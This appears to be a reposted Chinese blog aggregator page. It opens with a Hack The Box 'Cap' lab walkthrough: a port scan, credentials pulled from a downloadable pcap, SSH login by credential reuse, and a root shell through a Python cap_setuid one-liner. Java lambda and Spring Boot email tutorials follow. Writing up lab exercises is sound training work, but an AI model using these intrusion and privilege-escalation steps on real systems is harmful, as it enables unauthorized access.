9
10
11
12
bash复制代码┌──(root💀kali)-[~/htb/cab]
└─# nmap -sV -Pn 10.10.10.245
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 08:33 EST
Nmap scan report for 10.10.10.245
Host is up (0.35s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

服务枚举分析

ftp不可以匿名登录

爆破目录没啥发现

80服务打开是一个像网络管理之类的后台(无需登录),展示了三个栏目分别对应ifconfig,netstat和截取流量服务(可以下载靶机的pcap文件)

看来攻击点主要在80端口

后台的用户名叫:nathan

在http://10.10.10.245/data/1这个页面每个5秒钟会更新一个pcap文件,当前时间可以下载最新的文件,循环范围是1-5

但是有登录信息的文件藏在0号文件里,也就是http://10.10.10.245/data/0

惊不惊喜,意不意外?

把第0个pcap文件下载到本地,用wireshark打开

第36个数据报找到ftp用户名:nathan

第40个数据报找到ftp密码:{就不告诉你}

登录ftp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
yaml复制代码┌──(root💀kali)-[~/htb/cap]
└─# ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:root): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 1001 1001 4096 May 27 2021 .
drwxr-xr-x 3 0 0 4096 May 23 2021 ..
lrwxrwxrwx 1 0 0 9 May 15 2021 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 1001 1001 3771 Feb 25 2020 .bashrc
drwx------ 2 1001 1001 4096 May 23 2021 .cache
-rw-r--r-- 1 1001 1001 807 Feb 25 2020 .profile
lrwxrwxrwx 1 0 0 9 May 27 2021 .viminfo -> /dev/null
-r-------- 1 1001 1001 33 Nov 28 15:32 user.txt
226 Directory send OK.

我们顺利登录到了ftp,看上去是nathan用户的home目录,看见有user.txt,但是我们没有权限读。

初始shell

很多懒惰的管理员都习惯用同样的登录信息用于各种服务,尝试用上面的登录凭证登录到ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
css复制代码┌──(root💀kali)-[~/htb/cap]
└─# ssh nathan@10.10.10.245
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.245' (ECDSA) to the list of known hosts.
nathan@10.10.10.245's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Nov 28 16:00:07 UTC 2021

System load: 0.0 Processes: 225
Usage of /: 36.6% of 8.73GB Users logged in: 0
Memory usage: 21% IPv4 address for eth0: 10.10.10.245
Swap usage: 0%

=> There are 2 zombie processes.

* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.

https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
nathan@cap:~$ pwd
/home/nathan
nathan@cap:~$ ls
user.txt

拿到user.txt

提权

传linpea,发现python有setuid的能力

1
ini复制代码/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

用python提权

1
2
3
4
5
bash复制代码nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
# whoami
root

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

JDK8-Lambda表达式

发表于 2021-11-29

这是我参与11月更文挑战的第19天,活动详情查看:2021最后一次更文挑战

欢迎关注公众号OpenCoder,来和我做朋友吧~❤😘😁🐱‍🐉👀

Lambda表达式

概述

官网对lambda表达式的描述

官网:docs.oracle.com/javase/tuto…

​ One issue with anonymous classes is that if the implementation of your anonymous class is very simple, such as an interface that contains only one method, then the syntax of anonymous classes may seem unwieldy and unclear. In these cases, you’re usually trying to pass functionality as an argument to another method, such as what action should be taken when someone clicks a button. Lambda expressions enable you to do this, to treat functionality as method argument, or code as data.

​ 匿名类的一个问题是,如果匿名类的实现非常简单,例如只包含一个方法的接口,那么匿名类的语法可能会显得笨拙和不清楚。在这些情况下,您通常会尝试将功能作为参数传递给另一个方法,例如当有人单击按钮时应该采取什么操作。 Lambda 表达式使您能够做到这一点,将功能视为方法参数,或将代码视为数据。

描述中包含了三层含义

  • lambda表达式是对匿名类的简化
  • lambda使用的前提
    • 一个接口
    • 接口中包含一个方法
  • lambda表达式的理解:将功能作为参数传递给另一个方法

示例代码

  • 创建并开启一个线程,使用匿名内部类的方式实现Runnable,重写run方法
1
2
3
4
5
6
7
8
java复制代码public static void main(String[] args) {
new Thread(new Runnable() { // 匿名内部类
@Override
public void run() {
System.out.println("我是线程开启执行的代码");
}
}).start();
}
  • Runnable接口中只有一个抽象方法run。用lambda表达式改写
1
2
3
4
5
6
7
java复制代码// @FunctionalInterface
// public interface Runnable {
// public abstract void run();
// }
public static void main(String[] args) {
new Thread(() -> System.out.println("我是线程开启执行的代码")).start();
}
  • 说明

image-20211122211356351

语法

基本语法

从上述案例中,使用lambda表达式是对Runnable接口中的run方法进行了重写

格式:(抽象方法的参数列表) -> {重写的代码}

示例代码

删除集合中大于3的元素

  • 匿名内部类
1
2
3
4
5
6
7
8
java复制代码List<Integer> list = new ArrayList<>(Arrays.asList(1,2,3,4,5));
list.removeIf(new Predicate<Integer>() {
@Override
public boolean test(Integer i) {
return i > 3;
}
});
System.out.println(list); // [1, 2, 3]
  • lambda表达式
1
2
3
java复制代码List<Integer> list = new ArrayList<>(Arrays.asList(1,2,3,4,5));
list.removeIf((Integer i) -> {return i > 3;});
System.out.println(list); // [1, 2, 3]
  • 说明

image-20211122215836842

简写语法

参数的简写

  • 抽象方法参数的个数
    • 空参:不省略。
    • 一个参数:省略小括号,省略参数类型。
      • 省略前:(Integer i) -> {}
      • 省略后:i -> {}
    • 多个参数:省略参数类型。
      • 省略前:(String a, Integer b) -> {}
      • 省略后: (a,b) -> {}

方法体的简写

  • 方法体中只有一行表达式:省略大括号、return、分号。
    • 省略前:(Integer i) -> {return i > 3;}
    • 省略后:i -> i > 3

示例代码

  • lambda表达式
1
2
3
java复制代码List<Integer> list = new ArrayList<>(Arrays.asList(1,2,3,4,5));
list.removeIf((Integer i) -> {return i > 3;});
System.out.println(list); // [1, 2, 3]
  • 简写
1
2
3
java复制代码List<Integer> list = new ArrayList<>(Arrays.asList(1,2,3,4,5));
list.removeIf(i -> i > 3);
System.out.println(list); // [1, 2, 3]

函数式接口

概述

函数式接口:有一个抽象方法的接口

jdk为函数式接口提供了注解:@FunctionalInterface。

注解作用在接口上,用于校验该接口是否为函数式接口

示例

  • Inter接口中包含两个抽象方法

image-20211122221857068

JDK 8 中新增的函数式接口

在java.util.function包中新增多个函数式接口

例如:Predicate、Supplier、Function、Consumer

原理

debug调试

  • Demo.java
1
2
3
4
5
6
7
java复制代码public class Demo {
public static void main(String[] args) {
new Thread(() -> {
System.out.println("我是线程启动后执行的代码");
}).start();
}
}
  • debug运行

image-20211123000547877

  • 说明
+ run:748,Thread(java.lang):调用Thread中的run方法
+ run:-1,1156060786(`org.example.Demo$$Lambda$1`):调用`Demo$$Lambda$1`中的run方法
+ `lambda$main$0:10`,Demo(org.example): 方法`lambda$main$0`中执行了 打印语句
  • 小结
+ `Demo$$Lambda$1`这个类中的run方法 调用 -----> `lambda$main$0`方法 -------> 执行 lambda表达式代码块的代码(打印语句)

保留lambda语句产生的字节码文件

  • java命令+参数。在硬盘中产生一个新的class文件(Demo$$Lambda$1.class)
1
shell复制代码java -Djdk.internal.lambda.dumpProxyClasses Demo.class

image-20211123001203190

  • 将该文件拖入的idea中
+ `Demo$$Lambda$1`是Runnable的实现类
+ run方法中调用`Demo.lambda$main$0()`方法![image-20211123001344875](https://gitee.com/songjianzaina/juejin_p6/raw/master/img/ff9a719fe2fd3db0c2131a34232b3bc2cc204513d24e047dc8d3bc66f4744023)

原理理解

image-20211123002803105

方法引用(Method references)

概述

官网对方法引用的描述

官网:docs.oracle.com/javase/tuto…

​ You use lambda expressions to create anonymous methods. Sometimes, however, a lambda expression does nothing but call an existing method. In those cases, it’s often clearer to refer to the existing method by name. Method references enable you to do this; they are compact, easy-to-read lambda expressions for methods that already have a name.

​ 您可以使用 lambda 表达式来创建匿名方法。然而,有时 lambda 表达式除了调用现有方法之外什么都不做。在这些情况下,按名称引用现有方法通常会更清楚。方法引用使您能够做到这一点;它们是用于已具有名称的方法的紧凑、易于阅读的 lambda 表达式。

描述中包含两层含义

  • 方法引用,用于labmda表达式中
  • 前提:lambda 表达式除了调用现有方法之外什么都不做。(下一节语法中的案例进行说明)
    • lambda表达式中的参数调用方法
      • 示例:(String s) -> s.toLowerCase()
    • labmda表达式中的参数作为其他方法的参数
      • 示例:(Ineger i) -> String.valueOf(i)

语法

官网:docs.oracle.com/javase/tuto…

There are four kinds of method references:

Kind Syntax Examples
Reference to a static method ContainingClass::staticMethodName Person::compareByAge MethodReferencesExamples::appendStrings
Reference to an instance method of a particular object containingObject::instanceMethodName myComparisonProvider::compareByName myApp::appendStrings2
Reference to an instance method of an arbitrary object of a particular type ContainingType::methodName String::compareToIgnoreCase String::concat
Reference to a constructor ClassName::new HashSet::new

四种方法引用

种类 语法 示例
引用静态方法 类名::静态方法名 Person::compareByAge MethodReferencesExamples::appendStrings
对特定对象的实例方法的引用 对象名::方法名 myComparisonProvider::compareByName myApp::appendStrings2
对特定类型的任意对象的实例方法的引用 类名::方法名 String::compareToIgnoreCase String::concat
引用构造方法 类名::new HashSet::new

下面的案例中会用到Stream相关API,我们会在后续的文章中进行详细讨论。

  • 引用静态方法
1
2
3
4
5
6
7
8
java复制代码// 将集合中的Integer 转换为 String, 并收集到一个新的集合中
List<Integer> integerList = new ArrayList<>(Arrays.asList(1,2,3,4,5));
List<String> stringList = integerList.stream()
// 参数i 作为String静态方法valueOf的参数。并且lambda表达式中除了方法的调用以外其他什么都没做
// .map(i -> String.valueOf(i))
.map(String::valueOf) // 引用String类中的静态方法valueOf。类名::静态方法名
.collect(Collectors.toList());
System.out.println(stringList);
  • 对特定对象的实例方法的引用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
java复制代码public class Demo {
public static void main(String[] args) {
Test test = new Test();
List<Integer> integerList = new ArrayList<>(Arrays.asList(1,2,3,4,5));
integerList.stream()
/*
1.与静态方法不同,要想使用Test类中的show方法 需要先有Test类的实例
2.参数i 作为test对象show方法的参数
3.并且lambda表达式中除了方法的调用以外其他什么都没做
*/
// .forEach(i -> test.show(i));
.forEach(test::show); // 引用test对象中的方法show。对象名::方法名
}
}

class Test{
public void show(Object o){
System.out.println(o);
}
}
  • 对特定类型的任意对象的实例方法的引用
1
2
3
4
5
6
7
8
9
10
11
java复制代码// 将集合中的元素转成大写,并收集到新的集合中
List<String> list = new ArrayList<>(Arrays.asList("a","b","c"));
List<String> list2 = list.stream()
/*
1.参数s 作为toUpperCase方法的调用者
2.并且lambda表达式中除了方法的调用以外其他什么都没做
3.引用的类型为参数s的数据类型String
*/
// .map(s -> s.toUpperCase())
.map(String::toUpperCase) // 引用String类中的方法toUpperCase。类名::方法名
.collect(Collectors.toList());
  • 引用构造方法
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
java复制代码// 将集合中的元素转成Person对象,并收集到新的集合中
public class Demo {
public static void main(String[] args) {
List<String> stringList = new ArrayList<>(Arrays.asList("张三","李四","王五"));

List<Person> personList = stringList.stream()
/*
1.参数s 作为Person类构造方法的参数
2.并且lambda表达式中除了方法的调用以外其他什么都没做
*/
// .map(s -> new Person(s))
.map(Person::new) // 引用Person类中的构造方法。类名::new
.collect(Collectors.toList());
}
}

class Person{
private String name;

public Person(String name) {
this.name = name;
}
}

下期预告

Stream相关API和原理

欢迎关注公众号OpenCoder,来和我做朋友吧~❤😘😁🐱‍🐉👀

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

Spring Boot(十):集成邮件发送功能

发表于 2021-11-29

「这是我参与11月更文挑战的第21天,活动详情查看:2021最后一次更文挑战」。

在 Spring Boot 项目开发中,或多或少会接触到邮件发送这个功能,若要在 Spring 项目中实现发送邮件,需要封装较为复杂的消息体,但在 Spring Boot 项目中仅需导入第三方依赖以及配置即可完成。

本文以 163 邮箱为例演示邮件发送功能的实现,其他邮箱的配置大同小异。

  1. 获取邮箱的授权码

常用的邮件传输协议有 POP3、SMTP、IMAP,这里选择 SMTP 协议进行演示。

首先我们登录自己的邮箱,在设置中找到协议地址:

然后点击开启服务,获得授权码(授权码仅显示一次,务必保管好):

如下是网易邮箱对应的三种协议主机地址:

  1. 引入依赖

1
2
3
4
xml复制代码<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-mail</artifactId>
</dependency>
  1. 配置邮箱信息

⭐注意:如下 password 指向的是刚刚保存的授权码,而非个人邮箱密码。

1
2
3
4
5
6
7
8
9
yaml复制代码spring:
mail:
default-encoding: utf-8
# 主机地址
host: smtp.163.com
# 邮箱名
username: xxx@163.com
# 授权码 (非邮箱密码)
password: xxxxxxxxxxxxxxx
  1. 发送邮件

4.1 纯文本邮件

如下封装了 SimpleMailMessage 消息内容,注入 JavaMailSender 并调用其 send() 以完成邮件发送功能。其中收件人和抄送人可支持多个同时发送,多个地址间使用 , 拼接即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
java复制代码@RestController
public class EmailController {

@Autowired
private JavaMailSender javaMailSender;

@RequestMapping("/sendMail")
public void send() {
SimpleMailMessage message = new SimpleMailMessage();
// 发件人
message.setFrom("xxx@163.com");
// 收件人(可实现批量发送)
message.setTo("xxx1@qq.com", "xxx2@qq.com");
// 邮箱标题
message.setSubject("Java发送邮箱Demo");
// 邮箱内容
message.setText("测试 Spring Boot 集成邮箱发送功能的!");
// 抄送人
message.setCc("xxx?@163.com");
// 发送邮件
javaMailSender.send(message);
}
}

4.2 HTML 格式邮件⭐

与发送纯文本不同的是,发送 HTML 格式需要创建一个 MIME 消息,并将其注入到 MimeMessageHelper 对象中,但仍是以 JavaMailSender 接口进行发送:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
java复制代码@RestController
public class EmailController {

@RequestMapping("/sendHtmlMail")
public void sendHtmlMsg() throws MessagingException {
MimeMessage message = javaMailSender.createMimeMessage();
MimeMessageHelper mimeHelper = new MimeMessageHelper(message, true);
// 发件人
mimeHelper.setFrom("xxx@163.com");
// 收件人
mimeHelper.setTo("xxx@qq.com");
// 邮箱标题
mimeHelper.setSubject("Java发送邮箱Demo");
// 邮箱内容
mimeHelper.setText("<h2>MimeMessageHelper测试</h2>", true);

// 仍然使用 JavaMailSender 接口发送邮件
javaMailSender.send(message);
}
}

4.3 携带附件的邮件⭐

相对于发送 HTML 仅多增加了 addAttachment() 方法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
java复制代码@RestController
public class EmailController {

@Autowired
private JavaMailSender javaMailSender;

@RequestMapping("/addAttachment")
public void sendMailWithAttachment() throws MessagingException {
MimeMessage message = javaMailSender.createMimeMessage();
MimeMessageHelper mimeWithAttachment = new MimeMessageHelper(message, true);
// 发件人
mimeWithAttachment.setFrom("w577159462@163.com");
// 收件人
mimeWithAttachment.setTo("577159462@qq.com");
// 邮箱标题
mimeWithAttachment.setSubject("发送邮件(带附件)");
// 邮箱内容
mimeWithAttachment.setText("添加附件..");

// 1 附件添加图片
mimeWithAttachment.addAttachment("1.jpg", new File("D:\\Temp\\_mail\\1.jpg"));
// 2. 附件添加word文档
mimeWithAttachment.addAttachment("test.docx", new File("D:\\Temp\\_mail\\test.docx"));

// 仍然使用 JavaMailSender 接口发送邮件
javaMailSender.send(message);
}
}

4.4 内嵌图片邮件

addInline() 实现发送图片:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
java复制代码@RestController
public class EmailController {

@Autowired
private JavaMailSender javaMailSender;

@RequestMapping("/embeddedPic")
public void mailWithEmbeddedPic() throws MessagingException {
MimeMessage message = javaMailSender.createMimeMessage();
MimeMessageHelper embeddedPic = new MimeMessageHelper(message, true);
// 发件人
embeddedPic.setFrom("xxx@163.com");
// 收件人
embeddedPic.setTo("xxx@qq.com");
// 邮箱标题
embeddedPic.setSubject("发送邮件(内嵌图片)");
// 邮箱内容
embeddedPic.setText("发送内嵌图片..");
// 添加内嵌图片
embeddedPic.addInline("img1.jpg", new FileSystemResource("D:\\Temp\\_mail\\1.jpg"));

// 仍然使用 JavaMailSender 接口发送邮件
javaMailSender.send(message);
}

}

至此,我们就在 Spring Boot 环境中快速实现了邮件发送功能,是不是比想象中的还要简单且迅速?!

希望本文对你有所帮助🧠

欢迎在评论区留下你的看法🌊,我们一起讨论与分享🔥

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

1…129130131…956

开发者博客

9558 日志
1953 标签
RSS
© 2025 开发者博客
本站总访问量次
由 Hexo 强力驱动
|
主题 — NexT.Muse v5.1.4
0%